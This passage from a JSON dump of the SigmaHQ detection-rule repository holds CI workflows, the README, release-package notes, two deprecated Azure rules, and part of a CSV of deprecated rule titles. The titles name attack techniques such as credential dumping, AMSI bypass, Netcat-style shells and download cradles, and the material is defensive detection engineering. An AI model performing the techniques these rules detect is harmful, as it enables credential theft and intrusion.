\"^id: \" rules* deprecated unsupported | sort | uniq -c | grep -vE \"^\\s+1 id: \"; exit $(( $? ^ 1 ))\n"
  },
  {
    "path": ".github/workflows/sigma-validation.yml",
    "content": "name: Validate Sigma rules\n\non: [push, pull_request, merge_group, workflow_dispatch]\n\njobs:\n  sigma-rules-validator:\n    runs-on: ubuntu-latest\n    steps:\n      - name: Validate Sigma rules\n        uses: SigmaHQ/sigma-rules-validator@v1\n        with:\n          paths: |-\n            ./rules\n            ./rules-compliance\n            ./rules-dfir\n            ./rules-emerging-threats\n            ./rules-placeholder\n            ./rules-threat-hunting\n          schemaFile: ${{ github.workspace }}/tests/validate-sigma-schema/sigma-schema.json\n"
  },
  {
    "path": ".github/workflows/update-heatmap.yml",
    "content": "name: Generate Updated ATT&CK Heatmap\non:\n  schedule:\n    - cron: \"0 0 1 * *\"\n  workflow_dispatch:\n\n\njobs:\n  generate-heatmap:\n    runs-on: ubuntu-latest\n    steps:\n      - name: Checkout Repository\n        uses: actions/checkout@v5\n        with:\n          submodules: true\n\n      - name: Install Sigma\n        run: pipx install sigma-cli\n\n      - name: Update Heatmap\n        run: sigma analyze attack count --min-score 0 --max-score 20 --min-color '#66b1ffff' --max-color '#ff66f4ff' ./other/sigma_attack_nav_coverage.json rule*\n\n      - name: Create Pull Request\n        uses: peter-evans/create-pull-request@v7\n        with:\n          reviewers: nasbench, frack113, phantinuss\n          delete-branch: true\n          commit-message: 'chore: update ATT&CK heatmap'\n          branch: 'create-pull-request/update-heatmap'\n          title: 'Update ATT&CK Heatmap Coverage'\n          body: |\n            ### Summary of the Pull Request\n\n            This PR updates sigma_attack_nav_coverage.json to reflect the current rule coverage.\n            To generate a new SVG file, go to the [MITRE ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/SigmaHQ/sigma/master/other/sigma_attack_nav_coverage.json) and export a SVG via \"Layer Controls\" > \"Export\" (download icon) > \"render layer to SVG\".\n\n            ### Changelog\n\n            chore: update ATT&CK heatmap\n\n            ### Example Log Event\n\n            N/A\n\n            ### Fixed Issues\n\n            N/A\n\n            ### SigmaHQ Rule Creation Conventions\n\n            - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md)\n"
  },
  {
    "path": ".gitignore",
    "content": "# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\n*$py.class\n\n# C extensions\n*.so\n\n# Distribution / packaging\n.Python\nenv/\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib/\nlib64/\nparts/\nsdist/\nvar/\n*.egg-info/\n.installed.cfg\n*.egg\n\n# PyInstaller\n#  Usually these files are written by a python script from a template\n#  before PyInstaller builds the exe, so as to inject date/other infos into it.\n*.manifest\n*.spec\n\n# Installer logs\npip-log.txt\npip-delete-this-directory.txt\n\n# Unit test / coverage reports\nhtmlcov/\n.tox/\n.coverage\n.coverage.*\n.cache\nnosetests.xml\ncoverage.xml\n*,cover\n.hypothesis/\n\n# Translations\n*.mo\n*.pot\n\n# Django stuff:\n*.log\nlocal_settings.py\n\n# Flask stuff:\ninstance/\n.webassets-cache\n\n# MacOS Finder\n.DS_Store\n\n# Scrapy stuff:\n.scrapy\n\n# Sphinx documentation\ndocs/_build/\n\n# PyBuilder\ntarget/\n\n# IPython Notebook\n.ipynb_checkpoints\n\n# pyenv\n.python-version\n\n# celery beat schedule file\ncelerybeat-schedule\n\n# dotenv\n.env\n\n# virtualenv\nvenv/\nENV/\n\n# Spyder project settings\n.spyderproject\n\n# Rope project settings\n.ropeproject\n\n# vi(m)\n*.swp\nsettings.json\n\n# VisualStudio\n.vs/\n.vscode/launch.json\n\n# sigma2attack\nheatmap.json\n"
  },
  {
    "path": ".yamllint",
    "content": "# https://yamllint.readthedocs.io/en/latest/configuration.html\nextends: default\n\nignore:\n    - .github/\n    - deprecated/\n    - other/godmode_sigma_rule.yml\n    - tests/\n    - unsupported/\n\nrules:\n    comments:\n        require-starting-space: true\n        min-spaces-from-content: 1\n    comments-indentation: disable\n    document-start: {present: false}\n    empty-lines: {max: 2, max-start: 2, max-end: 2}\n    indentation: {spaces: 4, indent-sequences: whatever}\n    line-length: disable\n    new-line-at-end-of-file: enable\n    trailing-spaces: {}\n"
  },
  {
    "path": "CONTRIBUTING.md",
    "content": "# Contributing to Sigma 🧙‍♂️\n\nFirst off, thank you for considering contributing to Sigma! Your help is invaluable in keeping this project up-to-date and useful for the community.\n\nThe following guidelines will help you understand how to contribute effectively.\n\n## 📝 Reporting False Positives Or Proposing New Detection Rule Ideas 🔎\n\nIf you find a false positive or would like to propose a new detection rule idea but do not have the time to create one, please create a new issue on the [GitHub repository](https://github.com/SigmaHQ/sigma/issues/new/choose) by selecting one of the available templates.\n\n## 🛠️ Submitting Pull Requests (PRs)\n\n1. Fork the [SigmaHQ repository](https://github.com/SigmaHQ/sigma) and clone your fork to your local machine.\n\n2. Create a new branch for your changes:\n\n```bash\ngit checkout -b your-feature-branch\n```\n\n3. Make your changes, and test them:\n\n```bash\npython tests/test_logsource.py\npython tests/test_rules.py\n```\n\n4. Once the test is successful, commit the changes to your branch:\n\n```bash\ngit add .\ngit commit -m \"Your commit message\"\n```\n\n5. Push your changes to your fork:\n\n```bash\ngit push origin your-feature-branch\n```\n\n6. Create a new Pull Request (PR) against the upstream repository:\n\n* Go to the [Sigma repository](https://github.com/SigmaHQ/sigma) on GitHub\n* Click the \"New Pull Request\" button\n* Choose your fork and your feature branch\n* Add a clear and descriptive title and a detailed description of your changes\n* Submit the Pull Request\n\n## 📚 Adding or Updating Detection Rules\n\nTo update or contribute a new rule please make sure to follow the guidelines in the [SigmaHQ conventions documents](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq). Consider installing the [VsCode Sigma Extension](https://marketplace.visualstudio.com/items?itemName=humpalum.sigma) for auto completion and quality of life features.\n\nThank you for contributing to Sigma! 🧙‍♂️\n"
  },
  {
    "path": "LICENSE",
    "content": "# Licenses\n\nThe content of this repository is released under the following licenses:\n\n- The Sigma specification (https://github.com/SigmaHQ/sigma-specification) and the Sigma logo are public domain\n- The rules contained in the SigmaHQ repository (https://github.com/SigmaHQ) are released under the [Detection Rule License (DRL) 1.1](https://github.com/SigmaHQ/Detection-Rule-License)\n"
  },
  {
    "path": "README.md",
    "content": "# Sigma - Generic Signature Format for SIEM Systems\n\n<a href=\"https://sigmahq.io/\">\n<p align=\"center\">\n<br />\n<picture>\n  <source media=\"(prefers-color-scheme: dark)\" srcset=\"./images/sigma_logo_dark.png\">\n  <img width=\"454\" alt=\"Sigma Logo\" src=\"./images/sigma_logo_light.png\">\n</picture>\n</p>\n</a>\n<br />\n\n<p align=\"center\">\n<a href=\"https://github.com/SigmaHQ/sigma/actions?query=branch%3Amaster\"><img src=\"https://github.com/SigmaHQ/sigma/actions/workflows/sigma-test.yml/badge.svg?branch=master\" alt=\"Sigma Build Status\"></a> <a href=\"https://sigmahq.io/\"><img src=\"https://cdn.jsdelivr.net/gh/SigmaHQ/sigmahq.github.io@master/images/Sigma%20Official%20Badge.svg\" alt=\"Sigma Official Badge\"></a> <img alt=\"GitHub Repo stars\" src=\"https://img.shields.io/github/stars/SigmaHQ/sigma\">\n<img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/SigmaHq/Sigma/total\">\n<br />\n<a href=\"https://opensourcesecurityindex.io/\" target=\"_blank\" rel=\"noopener\">\n<img style=\"width: 170px;\" src=\"https://opensourcesecurityindex.io/badge.svg\" alt=\"Open Source Security Index - Fastest Growing Open Source Security Projects\" width=\"170\" />\n</a>\n</p>\n\nWelcome to the Sigma main rule repository. The place where detection engineers, threat hunters and all defensive security practitioners collaborate on detection rules. The repository offers more than 3000 detection rules of different type and aims to make reliable detections accessible to all at no cost.\n\nCurrently the repository offers three types of rules:\n\n* [Generic Detection Rules](./rules/) - Are threat agnostic, their aim is to detect a behavior or an implementation of a technique or procedure that was, can or will be used by a potential threat actor.\n* [Threat Hunting Rules](./rules-threat-hunting/) - Are broader in scope and are meant to give the analyst a starting point to hunt for potential suspicious or malicious activity\n* [Emerging Threat Rules](./rules-emerging-threats/) - Are rules that cover specific threats, that are timely and relevant for certain periods of time. These threats include specific APT campaigns, exploitation of Zero-Day vulnerabilities, specific malware used during an attack,...etc.\n* [Compliance Rules](./rules-compliance/) - Are rules that help you identify compliance violations based on well known security frameworks such as CIS Controls, NIST, ISO 27001,...etc.\n* [Placeholder Rules](./rules-placeholder/) - Are rules that get their final meaning at conversion or usage time of the rule.\n\n## Explore Sigma\n\nTo start exploring the Sigma ecosystem, please visit the official website [sigmahq.io](https://sigmahq.io)\n\n### What is Sigma\n\nSigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write and applicable to any type of log file.\n\nThe main purpose of this project is to provide a structured form in which researchers or analysts can describe their once developed detection methods and make them shareable with others.\n\nSigma is for log files what [Snort](https://www.snort.org/) is for network traffic and [YARA](https://github.com/VirusTotal/yara) is for files.\n\n<picture>\n  <source media=\"(prefers-color-scheme: dark)\" srcset=\"./images/Sigma_description_dark.png\">\n  <img alt=\"Sigma Description - A diagram showing Yaml Files (Sigma Rules) moving through a Sigma Convertor, and coming out as many SIEM logos, showing how Sigma rules can be converted to many different available SIEM query languages\" src=\"./images/Sigma_description_light.png\">\n</picture>\n\n### Why Sigma\n\nToday, everyone collects log data for analysis. People start working on their own, processing numerous white papers, blog posts and log analysis guidelines, extracting the necessary information and build their own searches and dashboard. Some of their searches and correlations are great and very useful but they lack a standardized format in which they can share their work with others.\n\nOthers provide excellent analyses, include IOCs and YARA rules to detect the malicious files and network connections, but have no way to describe a specific or generic detection method in log events. Sigma is meant to be an open standard in which such detection mechanisms can be defined, shared and collected in order to improve the detection capabilities for everyone.\n\n### 🌟 Key Features\n\n* A continuously growing list of detection and hunting rules, peer reviewed by a community of professional Detection Engineers.\n* Vendor agnostic detection rules.\n* Easily shareable across communities and reports\n\n## 🏗️ Rule Creation\n\nTo start writing Sigma rules please check the following high level guide along with the sigma specification:\n\n* [Rule Creation High‐Level Guide]([https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide](https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-High%E2%80%90Level-Guide))\n* [Sigma Specification](https://github.com/SigmaHQ/sigma-specification)\n\n## 🔎 Contributing & Making PRs\n\nPlease refer to the [CONTRIBUTING](./CONTRIBUTING.md) guide for detailed instructions on how you can start contributing new rules.\n\n## 📦 Rule Packages\n\nYou can download the latest rule packages from the [release page](https://github.com/SigmaHQ/sigma/releases/latest) and start leveraging Sigma rules today.\n\n## 🧬 Rule Usage and Conversion\n\n* You can start converting Sigma rules today using [Sigma CLI](https://github.com/SigmaHQ/sigma-cli) or [sigconverter.io](https://sigconverter.io) the GUI interface\n\n* To integrate Sigma rules in your own toolchain or products use [pySigma](https://github.com/SigmaHQ/pySigma).\n\n## 🚨 Reporting False Positives or New Rule Ideas\n\nIf you find a false positive or would like to propose a new detection rule idea but do not have the time to create one, please create a new issue on the [GitHub repository](https://github.com/SigmaHQ/sigma/issues/new/choose) by selecting one of the available templates.\n\n## 📚 Resources & Further Reading\n\n* [Hack.lu 2017 Sigma - Generic Signatures for Log Events by Thomas Patzke](https://www.youtube.com/watch?v=OheVuE9Ifhs)\n* [MITRE ATT&CK® and Sigma Alerting SANS Webcast Recording](https://www.sans.org/webcasts/mitre-att-ck-sigma-alerting-110010 \"MITRE ATT&CK® and Sigma Alerting\")\n* [Sigma - Generic Signatures for SIEM Systems by Florian Roth](https://www.slideshare.net/secret/gvgxeXoKblXRcA)\n\n## Projects or Products that use or integrate Sigma rules\n* [AlphaSOC](https://docs.alphasoc.com/detections_and_findings/sigma_community/) - Leverages Sigma rules to increase coverage across all supported log sources\n* [alterix](https://github.com/mtnmunuklu/alterix) - Converts Sigma rules to the query language of CRYPTTECH's SIEM\n* [AttackIQ](https://www.attackiq.com/2024/01/10/sigmaiq-attackiqs-latest-innovation-for-actionable-detections/) - Sigma Rules integrated in AttackIQ's platform, and [SigmAIQ](https://github.com/AttackIQ/SigmAIQ) for Sigma rule conversion and LLM apps\n* [Atomic Threat Coverage](https://github.com/atc-project/atomic-threat-coverage) (Since December 2018)\n* [AttackRuleMap - Mapping of Atomic Red Team tests and Sigma Rules](https://attackrulemap.com/)\n* [Confluent Sigma](https://github.com/confluentinc/confluent-sigma) - Kafka Streams supported Sigma rules\n* [Detection Studio](https://detection.studio/?ref=sigmahq_readme) - Convert Sigma rules to any supported SIEM.\n* [IBM QRadar](https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2023/08/02/qradar-natively-supports-sigma-for-rules-creation)\n* [Impede Detection Platform](https://impede.ai/)\n* [Joe Sandbox](https://www.joesecurity.org/blog/8225577975210857708)\n* [LimaCharlie](https://limacharlie.io/)\n* [MISP](http://www.misp-project.org/2017/03/26/MISP.2.4.70.released.html) (Since Version 2.4.70, March 2017)\n* [Nextron's Aurora Agent](https://www.nextron-systems.com/aurora/)\n* [Nextron's THOR Scanner](https://www.nextron-systems.com/thor/) - Scan with Sigma rules on endpoints\n* [RANK VASA](https://globenewswire.com/news-release/2019/03/04/1745907/0/en/RANK-Software-to-Help-MSSPs-Scale-Cybersecurity-Offerings.html)\n* [Saeros](https://github.com/Saeros-Security/Saeros)\n* [Security Onion](https://docs.securityonion.net/en/latest/sigma.html)\n* [Sekoia.io XDR](https://www.sekoia.io) - XDR supporting Sigma and Sigma Correlation rules languages\n* [sigma2stix](https://github.com/muchdogesec/sigma2stix) - Converts the entire SigmaHQ Ruleset into STIX 2.1 Objects.\n  * A versioned archive of sigma2stix STIX 2.1 data is also available to [download here](https://github.com/muchdogesec/cti_knowledge_base_store/tree/main/sigma-rules).\n* [SIΣGMA](https://github.com/3CORESec/SIEGMA) - SIEM consumable generator that utilizes Sigma for query conversion\n* [SOC Prime](https://my.socprime.com/sigma/)\n* [TA-Sigma-Searches](https://github.com/dstaulcu/TA-Sigma-Searches) (Splunk App)\n* [TimeSketch](https://github.com/google/timesketch/commit/0c6c4b65a6c0f2051d074e87bbb2da2424fa6c35)\n* [ypsilon](https://github.com/P4T12ICK/ypsilon) - Automated Use Case Testing\n\n## 📜 Maintainers\n\n* [Nasreddine Bencherchali (@nas_bench)](https://twitter.com/nas_bench)\n* [Florian Roth (@cyb3rops)](https://twitter.com/cyb3rops)\n* [Christian Burkard (@phantinuss)](https://twitter.com/phantinuss)\n* [François Hubaut (@frack113)](https://twitter.com/frack113)\n* [Thomas Patzke (@blubbfiction)](https://twitter.com/blubbfiction)\n\n## Credits\n\nThis project would've never reached this height without the help of the hundreds of contributors. Thanks to all past and present contributors for their help.\n\n## Licenses\n\nThe content of this repository is released under the [Detection Rule License (DRL) 1.1](https://github.com/SigmaHQ/Detection-Rule-License).\n"
  },
  {
    "path": "Releases.md",
    "content": "This following document describes the different types of rule packages provided with every release.\n\n## Package Introduction\n\nThe rule packages provided with every release are split based on the [status](https://github.com/SigmaHQ/sigma-specification/blob/main/Sigma_specification.md#status-optional), [level](https://github.com/SigmaHQ/sigma-specification/blob/main/Sigma_specification.md#level) and [type](https://medium.com/sigma-hq/sigma-rule-repository-enhancements-new-folder-structure-rule-types-30adb70f5e10) of a sigma rule.\n\nThere are currently 3 main rule types provided in the sigma repository:\n\n- **core/generic**: Rules that match on attacker techniques. These rules are timeless and often match on new threats.\n- **emerging-threats/ET**: Rules that match on patterns of specific threat actors or exploits. High signal to noise ratio but will decrease in relevance over time.\n- **threat-hunting/TH**: Rules that should not be run for alerting but are interesting in giving detection ideas or hunt for suspicious activity inside an environment.\n\n### Package Overview\n\nname | status | level | type\n--- | --- | --- | ---\n[Core (Default)](#core-rules) | testing, stable | high, critical | core\n[Core+ (Rule Review needed)](#core-rules-1) | testing, stable | medium, high, critical | core\n[Core++ (Experimental)](#core-rules-2) | experimental, testing, stable | medium, high, critical | core\n[Emerging Threats AddOn Rules](#et-emerging-threats-addon-rules) | experimental, testing, stable | medium, high, critical | emerging threats\n[All rules](#all-rules) | experimental, testing, stable | medium, high, critical | core, emerging threats\n\nIf you are new, best start with the `Core` Sigma package. It includes high quality rules of high confidence and relevance and should not produce many false positives.\n\nIf your setup is working fine, you can add the `emerging threats` rules and start thinking about upgrading to `Core+` rules. If that is not enough and you like the pain, use the \"all\" rules package.\n\n### Defined Package\n\n#### Core Rules\n\nThe `Core` Sigma package includes high quality rules of high confidence and relevance and should not produce many false positives.\n\nThe selected rules are of level `high` or `critical`, which means matches are of high or critical importance. The rule status is `testing` or `stable`, which means the rule is at least of an age of half a year and no false positives were reported on it.\n\nThe type is `core`, meaning the rules will match on attacker technique and generic suspicious or malicious behavior.\n\n#### Core+ Rules\n\nThe plus in the `Core+` Sigma package stands for the addition of `medium` level rules. Those rules most often need additional tuning as certain applications, legitimate user behavior or scripts of an organization might be matched. Not every `medium` level rule is useful in every organization.\n\n#### Core++ Rules\n\nThe `Core++` package additionally includes the rules of `experimental` status. These rules are bleeding edge. They are validated against the Goodlog tests available to the SigmaHQ project and reviewed by multiple detection engineers. Other than that they are pretty much untested at first. Use these if you want to be able to detect threats as early as possible at the cost of managing a higher threshold of false positives.\n\nPlease report any false positives you find in the wild via our [github issue tracker](https://github.com/SigmaHQ/sigma/issues/new?assignees=&labels=False-Positive&projects=&template=false_positive_report.yml). After a grace period all `experimental` rules will eventually be promoted to status `test`.\n\n### Package AddOn's\n\n#### ET (Emerging Threats) AddOn Rules\n\nThe `ET AddOn` Sigma package contains all of the `emerging threats` rules. These rules have a low false positive rate so that it already contains rules of status `experimental`. These rules target specific threats and are especially useful for current threats where maybe not much information is yet available. So we want to get them to you as fast as possible. The package is an `AddOn` so you can use it on top of whichever `Core` package is most useful to you.\n\n### All Rules\n\n> **Note**\n>\n> This package doesn't contain all rules\n\nThis package includes all rules from level `medium` with a status of `experimental` and upwards including the `emerging threats` rules. Some heavy tuning is required when using this package.\n\nYou'll notice that rules of level `low` and some other are omitted even from this the `All Rules` package. We do not recommend using any other types of rules to generate alerts except for those provided in these packages.\n\n### Create Your Own Custom Rule Package\n\nReleases are tagged using the format `r<ISO 8601 date>` (e.g. `r2023-12-24`).\n\nYou can checkout any release version and create your own package using the [sigma-package-release](tests/sigma-package-release.py) script. Define the `status`, `level` and `type` of rules and the script generates a ZIP archive containing only those rules.\n\ne.g.\n\n```bash\n# python3 tests/sigma-package-release.py --min-status testing --levels high critical --types generic --outfile Sigma-custom.zip\n```\n\nYou can either give `level` and `status` as a space separated list or using a minimum value. See `--help` for all options\n"
  },
  {
    "path": "deprecated/README.md",
    "content": "# Deprecated folder\r\n\r\nThis folder contains all rules that have been marked as deprecated.\r\n\r\nIt is recommended to avoid using these rules, as they are no longer maintained or supported.\r\n\r\nFor a summary of the deprecated rules, refer to [deprecated.csv](./deprecated.csv) or [deprecated.json](./deprecated.json)\r\n\r\n\r\n# references\r\n\r\nhttps://github.com/SigmaHQ/sigma-specification/blob/main/specification/sigma-rules-specification.md#status"
  },
  {
    "path": "deprecated/cloud/azure_app_credential_modification.yml",
    "content": "title: Azure Application Credential Modified\nid: cdeef967-f9a1-4375-90ee-6978c5f23974\nstatus: deprecated\ndescription: Identifies when a application credential is modified.\nreferences:\n    - https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/\nauthor: Austin Songer @austinsonger\ndate: 2021-09-02\nmodified: 2025-10-17\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message: 'Update application – Certificates and secrets management'\n    condition: selection\nfalsepositives:\n    - Application credential added may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "deprecated/cloud/azure_app_permissions_for_api.yml",
    "content": "title: App Permissions Granted For Other APIs\nid: ba2a7c80-027b-460f-92e2-57d113897dbc\nstatus: deprecated\ndescription: Detects when app permissions (app roles) for other APIs are granted\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022/07/28\nmodified: 2023/03/29\ntags:\n    - attack.privilege_escalation\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Add app role assignment to service principal\n    condition: selection\nfalsepositives:\n    - When the permission is legitimately needed for the app\nlevel: medium\n"
  },
  {
    "path": "deprecated/deprecated.csv",
    "content": "id,title,date,modified,level\n867613fb-fa60-4497-a017-a82df74a172c,PowerShell Execution,2019-09-12,2021-11-05,medium\n0d894093-71bc-43c3-8c4d-ecfc28dcf5d9,Mimikatz Detection LSASS Access,2017-10-18,2022-04-11,high\n3d304fda-78aa-43ed-975c-d740798a49c1,Suspicious PowerShell Invocations - Generic,2017-03-12,2022-04-11,high\n56a8189f-11b2-48c8-8ca7-c54b03c2fbf7,Suspicious Esentutl Use,2020-05-23,2022-04-11,high\n65531a81-a694-4e31-ae04-f8ba5bc33759,Suspicious PowerShell Download,2017-03-05,2022-04-11,medium\n9f7aa113-9da6-4a8d-907c-5f1a4b908299,SyncAppvPublishingServer Execution to Bypass Powershell Restriction,2020-10-05,2022-04-11,medium\na0d63692-a531-4912-ad39-4393325b2a9c,RClone Execution,2021-05-10,2022-04-11,high\nb932b60f-fdda-4d53-8eda-a170c1d97bbd,Activity Related to NTDS.dit Domain Hash Retrieval,2019-01-16,2022-04-11,high\ncb7286ba-f207-44ab-b9e6-760d82b84253,Rclone Execution via Command Line or PowerShell,2021-05-26,2022-04-11,high\nfde7929d-8beb-4a4c-b922-be9974671667,SyncAppvPublishingServer Execution to Bypass Powershell Restriction,2020-10-05,2022-04-11,medium\n17f878b8-9968-4578-b814-c4217fc5768c,Autorun Keys Modification,2019-10-25,2022-05-14,medium\n29d31aee-30f4-4006-85a9-a4a02d65306c,Lateral Movement Indicator ConDrv,2021-04-27,2022-05-14,low\n98f4c75c-3089-44f3-b733-b327b9cd9c9d,Accessing Encrypted Credentials from Google Chrome Login Database,2021-12-20,2022-05-14,medium\na457f232-7df9-491d-898f-b5aabd2cbe2f,Windows Management Instrumentation DLL Loaded Via Microsoft Word,2019-12-26,2022-05-14,informational\ndb2110f3-479d-42a6-94fb-d35bc1e46492,CreateMiniDump Hacktool,2019-12-22,2022-05-14,high\n2621b3a6-3840-4810-ac14-a02426086171,Winword.exe Loads Suspicious DLL,2020-10-09,2022-07-25,medium\nbf6c39fc-e203-45b9-9538-05397c1b4f3f,Abusing Findstr for Defense Evasion,2020-10-05,2022-10-12,medium\n82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719,Possible Applocker Bypass,2019-01-16,2022-11-03,low\ndca91cfd-d7ab-4c66-8da7-ee57d487b35b,Process Start From Suspicious Folder,2022-02-11,2022-11-03,low\n53c7cca0-2901-493a-95db-d00d6fcf0a37,Brute Force,2019-10-25,2022-11-04,medium\n5f113a8f-8b61-41ca-b90f-d374fa7e4a39,Suspicious In-Memory Module Execution,2019-10-27,2022-11-17,low\nf67dbfce-93bc-440d-86ad-a95ae8858c90,Suspicious Bitsadmin Job via PowerShell,2018-10-30,2022-11-21,high\n9d1c72f5-43f0-4da5-9320-648cf2099dd0,Excel Proxy Executing Regsvr32 With Payload,2021-08-23,2022-12-02,high\nc0e1c3d5-4381-4f18-8145-2583f06a1fe5,Excel Proxy Executing Regsvr32 With Payload Alternate,2021-08-23,2022-12-02,high\n72671447-4352-4413-bb91-b85569687135,Nslookup PwSh Download Cradle,2022-09-06,2022-12-14,medium\n3f07b9d1-2082-4c56-9277-613a621983cc,Accessing WinAPI in PowerShell for Credentials Dumping,2020-10-06,2022-12-18,high\ne554f142-5cf3-4e55-ace9-a1b59e0def65,DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon,2020-10-12,2022-12-18,critical\n17eb8e57-9983-420d-ad8a-2c4976c22eb8,MavInject Process Injection,2018-12-12,2022-12-19,high\n36c5146c-d127-4f85-8e21-01bf62355d5a,Invoke-Obfuscation Via Use Rundll32,2019-10-08,2022-12-30,high\n6d3f1399-a81c-4409-aff3-1ecfe9330baf,PrintNightmare Powershell Exploitation,2021-08-09,2023-01-02,high\n83083ac6-1816-4e76-97d7-59af9a9ae46e,AzureHound PowerShell Commands,2021-10-23,2023-01-02,high\na85cf4e3-56ee-4e79-adeb-789f8fb209a8,Indirect Command Exectuion via Forfiles,2022-10-17,2023-01-04,medium\nfa47597e-90e9-41cd-ab72-c3b74cfb0d02,Indirect Command Execution,2019-10-24,2023-01-04,low\ne4b63079-6198-405c-abd7-3fe8b0ce3263,Suspicious CLR Logs Creation,2020-10-12,2023-01-05,high\ncd5c8085-4070-4e22-908d-a5b3342deb74,Suspicious Bitstransfer via PowerShell,2021-08-19,2023-01-10,medium\nd178a2d7-129a-4ba4-8ee6-d6e1fecd5d20,Renamed PowerShell,2019-08-22,2023-01-18,high\nd4d2574f-ac17-4d9e-b986-aeeae0dc8fe2,Renamed Rundll32.exe Execution,2022-06-08,2023-01-18,high\ne31f89f7-36fb-4697-8ab6-48823708353b,Suspicious Cmd Execution via WMI,2022-09-27,2023-01-19,medium\nbf7286e7-c0be-460b-a7e8-5b2e07ecc2f2,Netcat The Powershell Version - PowerShell Module,2021-07-21,2023-01-20,medium\n47688f1b-9f51-4656-b013-3cc49a166a36,Base64 Encoded Listing of Shadowcopy,2022-03-01,2023-01-30,high\n5b572dcf-254b-425c-a8c5-d9af6bea35a6,Potential Xor Encoded PowerShell Command,2022-07-06,2023-01-30,medium\nfd6e2919-3936-40c9-99db-0aa922c356f7,Malicious Base64 Encoded Powershell Invoke Cmdlets,2022-05-31,2023-01-30,high\neeb66bbb-3dde-4582-815a-584aee9fe6d1,Correct Execution of Nltest.exe,2021-10-04,2023-02-02,high\n0acaad27-9f02-4136-a243-c357202edd74,Ryuk Ransomware Command Line Activity,2019-08-06,2023-02-03,critical\n4f927692-68b5-4267-871b-073c45f4f6fe,PowerShell AMSI Bypass Pattern,2022-11-04,2023-02-03,high\n038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e,Registry Dump of SAM Creds and Secrets,2022-01-05,2023-02-04,high\n04f5363a-6bca-42ff-be70-0d28bf629ead,Office Applications Spawning Wmi Cli Alternate,2021-08-23,2023-02-04,high\n23daeb52-e6eb-493c-8607-c4f0246cb7d8,New Lolbin Process by Office Applications,2021-08-23,2023-02-04,high\n518643ba-7d9c-4fa5-9f37-baed36059f6a,WMI Execution Via Office Process,2021-08-23,2023-02-04,medium\n77815820-246c-47b8-9741-e0def3f57308,Domain Trust Discovery,2019-10-23,2023-02-04,medium\n4d6c9da1-318b-4edf-bcea-b6c93fa98fd0,Credential Acquisition via Registry Hive Dumping,2022-10-04,2023-02-06,high\n6545ce61-a1bd-4119-b9be-fcbee42c0cf3,Execute MSDT.EXE Using Diagcab File,2022-06-09,2023-02-06,high\n9841b233-8df8-4ad7-9133-b0b4402a9014,Sysinternals SDelete Registry Keys,2020-05-02,2023-02-07,medium\n09af397b-c5eb-4811-b2bb-08b3de464ebf,WMI Reconnaissance List Remote Services,2022-01-01,2023-02-14,medium\n7b0666ad-3e38-4e3d-9bab-78b06de85f7b,Renamed PaExec Execution,2019-04-17,2023-02-14,medium\nbc3cc333-48b9-467a-9d1f-d44ee594ef48,SCM DLL Sideload,2022-12-01,2023-02-14,medium\ne42af9df-d90b-4306-b7fb-05c863847ebd,WMI Remote Command Execution,2022-03-13,2023-02-14,medium\nfa4b21c9-0057-4493-b289-2556416ae4d7,Squirrel Lolbin,2019-11-12,2023-02-14,medium\ne011a729-98a6-4139-b5c4-bf6f6dd8239a,Suspicious Certutil Command Usage,2019-01-16,2023-02-15,high\n034affe8-6170-11ec-844f-0f78aa0c4d66,Mimikatz MemSSP Default Log File Creation,2021-12-20,2023-02-16,critical\n7fe71fc9-de3b-432a-8d57-8c809efc10ab,New Service Creation,2019-10-21,2023-02-20,low\n056a7ee1-4853-4e67-86a0-3fd9ceed7555,Invoke-Obfuscation RUNDLL LAUNCHER,2020-10-18,2023-02-21,medium\n3ede524d-21cc-472d-a3ce-d21b568d8db7,PsExec Service Start,2018-03-13,2023-02-28,low\n80167ada-7a12-41ed-b8e9-aa47195c66a1,Run Whoami as SYSTEM,2019-10-23,2023-02-28,high\nfa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba,PsExec Tool Execution,2017-06-12,2023-02-28,low\n2c0d2d7b-30d6-4d14-9751-7b9113042ab9,Suspicious Characters in CommandLine,2022-04-27,2023-03-03,high\n6783aa9e-0dc3-49d4-a94a-8b39c5fd700b,Stop Or Remove Antivirus Service,2021-07-07,2023-03-04,high\n7fd4bb39-12d0-45ab-bb36-cebabc73dc7b,Suspicious Execution of Sc to Delete AV Services,2022-08-01,2023-03-04,high\na7a7e0e5-1d57-49df-9c58-9fe5bc0346a2,Renamed PsExec,2019-05-21,2023-03-04,high\n1a70042a-6622-4a2b-8958-267625349abf,Run from a Zip File,2021-12-26,2023-03-05,medium\n46591fae-7a4c-46ea-aec3-dff5e6d785dc,Root Certificate Installed,2020-10-10,2023-03-05,medium\neb87818d-db5d-49cc-a987-d5da331fbd90,Stop Windows Service,2019-10-23,2023-03-05,low\n23250293-eed5-4c39-b57a-841c8933a57d,Visual Basic Script Execution,2022-01-02,2023-03-06,medium\n344482e4-a477-436c-aa70-7536d18a48c7,Execution via MSSQL Xp_cmdshell Stored Procedure,2022-09-28,2023-03-06,high\n00a4bacd-6db4-46d5-9258-a7d5ebff4003,Read and Execute a File Via 